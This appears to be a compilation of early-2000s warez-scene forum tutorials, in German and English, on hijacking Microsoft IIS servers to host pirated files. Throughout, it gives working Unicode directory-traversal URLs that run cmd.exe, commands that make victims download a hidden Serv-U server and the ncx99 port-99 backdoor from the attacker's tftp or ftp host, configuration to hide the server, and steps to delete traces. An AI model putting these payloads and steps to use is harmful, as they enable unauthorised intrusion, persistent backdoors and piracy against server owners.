    ?????????????????????????????????
    Free Space: %DFree KB
    Bandwidth: %ServerKBps KB/Sec
    Server Has Been Running For ]
    '%ServerDays ' Days, '%ServerHours' Hours, '%ServerMins' Minutes, and '%ServerSecs' Seconds
    Currenly Logged In %UNow
    Max %MaxUsers
    Logged in Past 24 Hours %U24h
    Logged In Since Start %UAll
    Uploaded Since Start: %ServerKbUp KB
    Downloaded Since Start %ServerKbDown KB
    ?????????????????????????????????
    Enjoy Our Warez
    Greets
    To Your Crew
    ?????????????????????????????????
    Ihr solltet nur alles entsprechend umändern, außer alles, wo ein % davorsteht. Beim konfigurieren von Serv-U könnt
    ihr für jeden User eine eigne Login.txt angeben. Ich empfehle aber, für jeden die selbe zu anzugeben.
    Falls noch Fragen bestehen könnt ihr mi ja einfach eine PN schicken.
    Ich hoffe ich konnte euer Wissen mit diesem Tutorial etwas erweitern und euch in eurer Karriere in der Warez-Szene
    etwas weiterhelfen





    TuT 5:

    also, was braucht man:

    1. einen gebugten nt server
    2. einen tftp server (programm)
    3. servU mit konfigurierter ini oder nen anderen ftp server

    wo man das her bekommt:

    1. scannen es gibt glaub ich auch scanner die nach dem bug scannen,
    ich hab bis jetzt noch immer alle zugeschoben bekommen. wie kann man rausfinden
    ob der entsprechende nt-server geugt ist? wir nehmen jetzt mal als beispiel die
    ip 1.1.1.1. nun öffnest du einen webbrowser und gehst auf die adresse:

    http://1.1.1.1/scripts/..%c0%af../winnt/....exe?/c+dir+c:\

    kommt nix hast du pech gehabt. der server ist nicht gebugt. kommt ne dir ausgabe
    hast du gück gehabt. dieser server ist gebugt.

    2. Top Themen A-Z

    3. Serv-U FTP Server - Secure FTP Server Software for Windows and Linux - crack bei ASTALAVISTA.BOX.SK

    vorbereitung:

    eine ServerUDemon.exe und ServerUDemon.ini (sollte konfiguriert sein) in ein lokales
    verzeichnes. tftp server starten, verzeichniß mit den dateien auf hauptverzeichniß
    setzen und lesezugrif geben. eigene ip rausfinden, und aufschreiben. die eigene ip wird
    im weiteren als 2.2.2.2 bezeichnet.

    vorgang an sich:

    mit http://1.1.1.1/scripts/..%c0%af../winnt/....exe?/c+dir+c:\ über die festplatte
    browsen und ein geeignetes dir finden, wo man den server verstecken kann. in unserem fall
    nehmen wir c:\winnt\system32. so nun muß ServU auf den server gelangen. das geht über tftp.
    einfach diese zeile anpassen und auf dem server ausführen:

    http://[ip.des.servers.den.du.hacken.willst]/scripts/..%c0%af../winnt/syste m32/cmd.exe?/c+tftp+-i+[deine.ip]+get+[wo.die.servudaemon.exe.auf.deiner.fe st.platte.liegt]ServUDaemon.exe+c:[wo.es.auf.dem.gehackten.hin.soll]ServUDa emon.exe

    und noch die ini:

    1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+2.2.2.2+get+Se rvUDaemon.ini+c:\winnt\system32\ServUDaemon.ini

    jetzt muß der server nur noch gestartet werden. das geht ganz einfach einfach die servu exe
    ausführen:

    1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\Serv UDaemon.exe

    so, nun ist der ftp server gestartet. mit servu 3 kann man jetz tnoch fernadministration, o.Ä.
    betreiben, auf jedenfall, jetzt ist der distro/pubstro/dump fertig







    Hi friends, da sind 2 Wege einen Server zu Hacken, auf jeden Fall benötigt ihr servu, damit ihr einen server auf dem server installieren könnt!!!!
    einmal gibt es die möglichkeit direkt servu4 zu installieren, was selten geht, oder ihr installiert erst servu2.5 auf ihm, das geht meistens und dann einfach über flashfxp servu4 starten!!!! Das mach ich immer, funzt bestens!!!!

    Zum Upload der Files, da gibt es 2 Möglichkeiten, einmal die tftp methode, die oben beschrieben ist, oder ihr erstellt ein Script auf dem server und führt es aus, das geht so, führt einfach diese befehle richtig aus!!!!


    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
    c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd2.exe
    /scripts/..%255c../inetpub\scripts/cmd2.exe?/c+dir+c:\


    c+echo+open+DEINE SERVER IP+DER PORT+>>+c:\inetpub\scripts\temp.txt
    c+echo+user+anonymous+>>+c:\inetpub\scripts\temp.txt
    c+echo+BLANK+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+ServUDaemon.exe+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+ServUDaemon.ini+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+TzoLibr.dll+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+welcomemsg.txt+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+KEY.OLD+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+Serv.exe+>>+c:\inetpub\scripts\temp.txt
    c+echo+get+SERV-U.INI+>>+c:\inetpub\scripts\temp.txt
    c+echo+QUIT+>>+c:\inetpub\scripts\temp.txt

    c+ftp+-i+-n+-v+-s:c:\inetpub\scripts\temp.txt
    c+del+c:\inetpub\scripts\temp.txt

    servu 2.5
    /scripts/..%255c../winnt/system32/cmd.exe?/c+call+c:\inetpub\scripts\serv.e xe+/h+/u+c:\inetpub\scripts\SERV-U.INI

    servu 4
    /scripts/..%255c../winnt/system32/cmd.exe?/c+call+c:\inetpub\scripts\ServUD aemon.exe



    DAS WARS SCHON!!!!
    ACHTUNG; ES GEHEN NICHT ALLE SERVER; BEI DEN MEISTEN NEWBIES DAS PROB; AUCH WENN IHR ALLES RICHTIG MACHT GEHT NICHT JEDER!!!!

    ALSO; mfg



    he How-To Hack IIS Servers For Pubstros
    (By GENERAL NEWBIE)
    March 20 ,2002

    #################################################For Educational Use Only###################################################


    Getting Started is simple... let me warn you that what your doing is illegal and dangerous. Now then
    This tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone
    elses pub hahahahaha!

    Now then the tools and knowledge you will need are as follows

    Tools Required:



    1. Serv-u Ftp Server 4.0 works just fine but versions 3.0 doesnt require an additional dll file
    2. TFTPSuitePro2000 (http://www.walusoft.co.uk/software/tftppro.exe)
    3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit
    4. Internet Explorer
    5. Other things to try


    Ok Let Me Start By Saying This Is For “Education Purpouses” Only And I Take No Responsibility For What You Do

    The Setup

    Step 1: Install Serv-u AND download the already preconfigured ServuDaemon from me (recommended as i will be explaining from this)

    The reason why i told you to download both is because the Servu Version 4 that you download has a admin program so you can
    make your own ini file after you understand everything i have in mine.

    Step 2: Install TFTPSuite (Durring Installation Pick SERVER)

    TFTPSuitePro Setup Open TFTPSuitePro, When It Asks U To Register Hit Register Than Cancel.You Should Have Sumtin That Looks
    Like This Hit System->Setup For Inbound Path File, Hit Browse And Pick The C:\FTP dir We Made, And Do The Same For
    Outbound Then Hit Ok. Now then when its time to upload files TFTP SERVER MUST BE RUNNING

    Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for IIS servers and find one to hack

    Here you will find tons of little programs that will assist you in hacking your server.

    Step 4: FIND A VERNURABLE SERVER

    Step 5: Start Making the Pub

    Ok im assuming you have a host that you can maybe get away with uploading files to.. and i say this because some networks
    are behind firewalls that dont allow TFTP to connect to outside host and estabish a connection. Thus even though
    you can use the unicode exploit on it to view all the files still doesnt mean you can upload files to it..
    PLus some host administrators make it so that you cant write to the HD... GOOD LUCk THERE



    Starting To THE HACK

    FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!

    The Right Side, You Should Be At A Directory Listing In Internet Explorer.The Dir Should Look Like This :

    http://xxx.xxx.xxx.xx/scripts/..%%35%63....32/cmd.exe?/c+d ir+c:\ <----- This line will vary


    Directory of c:\

    07/17/02 12:17a 1,000,000 ---=1Mb=---
    05/03/02 08:57a 0 AUTOEXEC.BAT
    05/03/02 08:54a 0 AUTOEXEC.CAM
    06/01/01 09:09a 0 CONFIG.SYS
    12/26/01 12:46p
    Desktop
    06/01/01 02:20p
    I386
    07/08/02 02:52p
    intepub
    06/01/01 02:49p
    NIC
    12/23/01 08:32p
    NIMDA TO
    12/23/01 08:32p
    Nimda Tool
    07/17/02 05:56p 65,634,304 pagefile.sys
    01/04/02 04:31p
    Program Files
    07/17/02 12:14a
    TEMP
    06/05/01 05:01p
    temptape
    06/01/01 04:53p
    Video
    12/23/01 09:53p
    Windows Update Setup Files
    07/17/02 05:50p
    WINNT
    19 File(s) 72,687,972 bytes
    480,750,592 bytes free





    Ok you get the idea of what your browser looks like because your experienced but you are clueless about this pub crap
    Now then you will need to start and run TFTP SERVER making sure you arent running and firewall because it will block
    your request.Now we will need to send the files through the TFTP Server to the host. And to do this you do something like



    http://xxx.xxx.xxx.xx/scripts/..%%35%63....32/cmd.exe?/c+c :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

    Now then you arent limited to just 1 dir to install this server to.. i like to hide mine in the c:\winnt\system but some people use the c:\intepub\scripts

    http://xxx.xxx.xxx.xx/scripts/..%%35%63....32/cmd.exe?/c+c :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

    So then you would copy the above line into the Internet Explorer And Hit Enter, Look At Your TFTPSuitePro Window
    And u Should See Its Uploading A File. NOTE SOMETIMES you get an error msg just refresh the page or..copy into another window and try again
    remember sometimes you get this msg because the host cant connect properly to you..


    Repeat for the following files:

    SFIND.exe -------> used to scan for more.. servers
    KILL.EXE -------> used to kill a task very handy
    TLIST.EXE -------> used to list all running processes or Task List
    ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99
    iis-scanner.EXE great for scanning servers
    servudaemon.ini needed for servu



    HOW THE UPLOAD FILES SHOULD LOOK gave 2 examples

    Error -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\winnt\system\ServUDaemon.ini

    Error -i+%20**.***.**.**+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe

    Error -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
    Error -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe

    Error -i+%20**.***.**.**+GET+TzoLibr.dll+c:\winnt\system\TzoLibr.dll

    Error -i+%20**.***.**.**+GET+ncx99.exe+c:\winnt\system\ncx99.exe

    Error -i+%20**.***.**.**+GET+bnc.cfg+c:\winnt\system\tlist.exe



    EXCUTE PROGRAMS

    Error c:\winnt\system\ncx99.exe

    Error +c:\winnt\system\ncx99.exe

    Error x99.exe%20/h





    After the file has been executed The Ftp Should Be Up!

    Test It With The Server Ip/Port/L/p You Setup Back In Servu Ftp Settings.

    If It Works You Now Have Complete Control Over The System!

    Now then here is where the Serv U 4.0 comes in you may now use the admin program that comes with it so that you can

    set up your server the way you want. You have Admin rights



    Other Shit How To Use 'Kill' And 'Tlist' and 'ncx99.exe'


    Tlist = Lists All Running Programs On Remote Machine
    Kill = Kills Ones U Specicify
    ncx99.exe = Dos like trojan

    How to use ncx99

    C:\>telnet host 99


    Then once you connect to your server you will see dos like enviroment so find where you uploaded tlist.exe and execute it

    c:\> cd winnt
    c:\>winnt\ cd system
    c:\>winnt\system\tlist.exe

    Tlist is good when you have ncx99.exe installed so its easier to just call it up
    c:\>winnt\system\tlist.exe

    -2 Idle.exe
    4 System.exe
    840 smss.exe
    948 csrss.exe
    972 winlogon.exe NetDDE Agent
    1016 services.exe
    1028 lsass.exe
    1216 svchost.exe
    1364 svchost.exe
    1500 svchost.exe
    1636 svchost.exe
    1820 spoolsv.exe
    1952 CTSVCCDA.exe
    1988 mdm.exe
    2024 DUC20.exe Duc20
    408 MsPMSPSv.exe
    3024 svchost.exe
    360 explorer.exe Program Manager
    3496 ctfmon.exe CiceroUIWndFrame
    3068 WinCinemaMgr.exe InterVideo WinCinema Manager
    1124 evntsvc.exe Notification Wnd for RNAdmin
    1568 msmsgs.exe DDE Server Window
    2664 iis-scanner.exe Notification Window
    2172 r_server.exe
    3712 daemon.exe
    2800 cmd.exe Command Prompt
    3880 TLIST.exe
    -2 _Total.exe




    now then to kill it there are two ways i will show you the first is from within the nxc99.exe because its best

    just look at the tlist.exe list and find the system process you want to kill

    now from the same dir that you installed kill run kill and

    for me it would be

    c:\>winnt\system\kill.exe


    now then lets say i wanted to close explorer.exe i look at the tlist and see that '360 explorer.exe' Program Manager

    360 is the process id that you will use to close down Explorer.exe so you call it like this

    c:\>winnt\system\kill.exe 360

    do another tlist.exe and you will no longer see explorer.exe there

    the other way to do this is to use the url

    Error +c:\winnt\system\kill.exe?number

    where number is again from the tlist.exe

    so to kill explorer.exe we do something like this

    Error +c:\winnt\system\kill.exe?360

    and it should say killed.




    TuT 6:




    1.)
    Als erstes installiert ihr jetzt Serv-U und konfiguriert den Port und
    die Login-Daten genau so , wie die späteren Login-Daten von dem Server
    sein sollen ... Interessant hierbei ist für uns am ende nur die
    Serv-u.exe und die Serv-u.ini...


    2.)
    Wir öffnen die Serv-U.ini , denn wir wollen noch ein bischen was dazu
    schreiben, damit uns der Admin nicht so schnell entdeckt...
    unter der Sektion [GLOBAL] fügen wir die Zeile

    INVISIBLE=TRUE ein...

    das bewirkt , das Serv-U nicht sichtbar auf dem Server gestartet wird...


    3.)
    bei eurem eingerichteten USER sollten die Zeilen ungefähr
    so aussehen :

    HomeDir=c:\
    AlwaysAllowLogin=YES
    Access1=h:\,RWAMCDLEP
    Access2=g:\,RWAMCDLEP
    Access3=f:\,RWAMCDLEP
    Access4=e:\,RWAMCDLEP
    Access5=d:\,RWAMCDLEP
    Access6=c:\,RWAMCDLEP
    Access7=j:\,RWAMCDLEP

    inklusive solltet ihr Zwei verschiedene USER eingerichtet haben
    einmal euer Zugang , der die kompletten Schreibrechte hat (s.o)
    und einen Zugang für remote-USER , die zB keine Schreibrechte haben
    sollen, der remote-USER account würde ungefähr so aussehen:

    Access1=c:\,RLP
    Access2=d:\,RLP (usw.)


    4.)
    Danach brauchen wir unseren Tripod-Account ;P ,
    dort laden wir ins root-Verzeichniss unsere Serv-U.exe und unsere
    konfigurierte Serv-U.ini...
    mehr brauchen wir dort erst mal nicht machen .


    5.)
    Jetzt benutzen wir den IIS-Scanner und suchen uns eine Range aus
    erfahrene Scanner gucken im IP-Index nach, oder man nimmt eine
    Hostlookup-Engine um Die Ip einer Site rauszufinden ...
    nun geben wir in unserem IIS-Scanner eine nette Range ein , die ihr
    euch ausgeguckt habt, und wir scannen ein bischen (kann manchmal auch
    recht lange dauern).
    Wenn uns dann der Scanner Einen Server anzeigt sollten wir uns mal die
    IP schnappen...


    6.)
    Nun starten wir den InternetExplorer und geben folgende zeile ein

    http://##IP##/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
    http://211.21.72.195/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+d:\ platte d aufmachen
    ##IP## steht hierbei für die IP des gescannten Servers ...
    mit dieser Zeile machen wir uns den Unicode Bug zunutze
    denn dieser String (/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c)
    bewirkt das man ins root-Verzeichniss des InetPub gelangt ..
    und mit +dir+c:\ kriegen wir den gesamten Inhalt des Laufwerkes c:\
    zu Gesichte ... schön oder ?
    und genau das machen wir uns zu nutze , denn wir können alle Dos-Befehle
    zu unseren Zwecken nutzen mit diesem Bug ...


    7.)
    WIR erstellen uns nun ein Verzeichnis wo wir unser kleines Serv-U
    platzieren wollen ; dieses Verzeichniss sollte nach Möglichkeit
    unauffällig sein damit
    der Admin keinen Verdacht schöpft ...

    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+mkdir+c:\winnt\system32\temporary

    8.)
    Nun schauen wir ob das Verzeichniss tatsächlich existiert :

    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\winnt\system32\temporary

    den Pfad müsstet ihr nach eurem anpassen
    wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich ..


    9.)
    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+superlol.exe

    dies brauchen wir um uns den Dos-Echo Befehl zu nutzen, damit wir auch
    eine Datei erstellen können
    10.)
    Darauf erstellen wir in unserem Verzeichniss eine .txt Datei
    welche wir als FTP-Script nutzen , damit sich der Server per FTP auf
    unserem Tripod-Account einwählt und sich dann Serv-U.exe -.ini downloadet..

    http://196.12.190.71/scripts/superlol.exe?/c+echo+open+ftp.tripod.com.br+21>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+fwrfiifd>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+fgoxntmh>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+get+ServUDaemon.exe>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+get+ServUDaemon.ini>>c:\Inetpub\scripts\ftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+quit>>c:\Inetpub\scripts\ftpscr.txt

    Diese Zeilen geben wir nach einander ein im browser , dadurch werden die
    commandos für den Server
    geschrieben ...
    Sollte doch eigentlich klar sein , was das bedeutet ;P


    11.)
    schauen wir uns die Datei erst nocheinmal an, ob auch alles richtig ist...
    wenn jetzt folgendes Erscheint ist alles okay *grins*:

    http://IP/scripts/superlol.exe?/c+type+c:\inetpub\scripts\ftpscr.txt
    open ##IP-VOM-FTP-SERVER##
    ##USERNAME##
    ##PASSWORD##

    BINARY
    get serv-u.exe
    get serv-u.ini
    quit


    12.)
    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\scripts\ftpscr.txt

    mit dieser Zeile führen wir nun unser kleines Script aus ...
    und der Server connected nun zu eurem Tripod-Account und holt sich euer
    Serv-U


    13.)
    jedoch liegen die Dateien nun im InetPub Verzeichniss des Servers , da wir
    aber jene in unser
    eigenes Verzeichniss verschieben wollen geben wir folgendes ein :

    http://ip/scripts/superlol.exe?/c+move+serv-u*.*+"c:\temp\etc\etc\etc"


    14.)
    Um unsere Spuren zu verwischen löschen wir vorsichtshalber noch einmal die
    Script Datei

    http://IP/scripts/superlol.exe?/c+del+c:\inetpub\scripts\ftpscr.txt+/Q/F


    15.)
    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\inetpub\scripts\ftpscr.txt mein angeleger pfad

    jetzt schauen wir nach ob Serv-u.exe und Serv-u.ini sich in unserem
    Verzeichniss befinden
    und ob die Script Datei gelöscht wurde ...
    wenn alles in Ordnung ist können wir jetzt weitermachen


    16.)
    Anschließend führen wir Serv-U auf dem Server aus ...
    mit folgendem Befehl ist uns jenes auch sofort möglich ...

    http://IP/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+c:\inetpub\mailroot\ServUDaemon.exe bsp

    man sollte ein paar Sekunden warten bevor man mit Versucht sich mit dem
    FTP Proggy einzuloggen...
    Wenn man Pech hat , dann hat man einen Server mit Firewall erwischt , das
    merkt man einfach daran das man
    nicht connecten kann ...
    wenn alles klappt könnt ihr euch aber mit euren Serv-U Einstellungen nun
    Problemlos einloggen ...


    17.)
    Jetzt sind wir im Root Verzeichniss des Servers... und haben auch volle
    Schreibrechte...
    Als nächstes suchen wir uns ein Unterverezeichniss oder erstellen eins, welches
    wir als das Verzeichniss benutzen
    wollen wo wir uploaden wollen...
    wenn dies geschehn ist müsst ihr nochmal die Serv-u.ini öffnen und jene
    jetzt anpassen :
    euer Account mit den Schreibrechten müsste dann so aussehen (Bsp.):

    HomeDir=d:\Melinda\WORK\sample\LESSON\new\

    AlwaysAllowLogin=YES
    Access1=h:\,RWAMCDLEP
    Access2=g:\,RWAMCDLEP
    Access3=f:\,RWAMCDLEP
    Access4=e:\,RWAMCDLEP
    Access5=d:\,RWAMCDLEP
    Access6=c:\,RWAMCDLEP
    Access7=j:\,RWAMCDLEP
    RelPaths=YES
    HomeDir=d:\Melinda\WORK\sample\LESSON\new\

    RelPaths=YES
    Access1=d:\Melinda\WORK\sample\LESSON\new\ ,RLP


    18.)
    nun gehen wir nochmal in das Verzeichniss wo unser Serv-U liegt und
    überschreiben
    die INI datei mit unserer neuen ...


    19.)
    wir reconnecten , und nun müssten wir in unserem Verezeichniss landen
    und man sollte es als root-Verzeichniss sehen...


    20.)
    ENDLICH könnt ihr euren gehackten Pub fillen...
    Das gute an Serv-u ist , das nun der Server Fxp-able und Resumeable ist...
    gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
    euren
    Stuff deleten...


    21.)+-s=für stop ist für serverausmachen
     
  2. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.